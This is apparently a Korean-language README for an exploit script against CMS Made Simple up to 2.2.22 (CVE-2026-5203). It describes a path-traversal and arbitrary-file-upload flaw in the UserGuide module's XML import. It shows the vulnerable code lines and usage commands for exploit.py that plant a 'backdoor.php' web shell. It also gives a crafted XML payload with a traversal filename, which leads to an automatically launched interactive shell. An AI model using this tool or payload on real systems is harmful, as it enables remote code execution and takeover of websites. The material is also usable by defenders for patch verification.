
CMS Made Simple의 CVE-2026-5203에 대한 익스플로잇으로, 경로 탐색 및 임의 파일 업로드를 활용하여 대화형 셸로 원격 코드 실행을 달성합니다.
CMS Made Simple ≤ 2.2.22의 UserGuide 모듈 XML 가져오기 기능은 사용자가 제공한 파일 이름을 검증하지 않아, 인증된 관리자가 경로 탐색 시퀀스를 통해 서버 파일 시스템 어디에든 임의의 파일(예: PHP 웹 셸)을 업로드할 수 있습니다.
| 필드 | 값 |
|---|---|
| 유형 | 경로 탐색 / 임의 파일 업로드 → RCE |
| 구성 요소 | UserGuide 모듈 — XML 가져오기 |
| 영향을 받는 파일 | modules/UserGuide/lib/class.UserGuideImporterExporter.php |
| CVSS v3.1 | 7.2 HIGH — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
| 인증 필요 | 예 (관리자) |
// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir = (string) $xmlFile->isdir;
이 함수는 Base64로 디코딩된 콘텐츠를 공격자가 제어하는 경로에 직접 씁니다.
python exploit.py <base_url> <admin_url> <username> <password> [upload_path]
예시:
# 기본 경로
python exploit.py http://target.com http://target.com/admin admin password123
# 사용자 정의 업로드 경로
python exploit.py http://target.com http://target.com/admin admin password123 \
../../../../../../var/www/html/backdoor.php
웹 셸이 업로드 후 접근 가능하면 대화형 셸이 자동으로 시작됩니다.
<?xml version="1.0" encoding="UTF-8"?>
<modulecontent>
<module>UserGuide</module>
<version>1.3</version>
<files>
<file>
<filename>../../../webshell.php</filename>
<isdir>0</isdir>
<data>[BASE64_ENCODED_PHP_CODE]</data>
</file>
</files>
</modulecontent>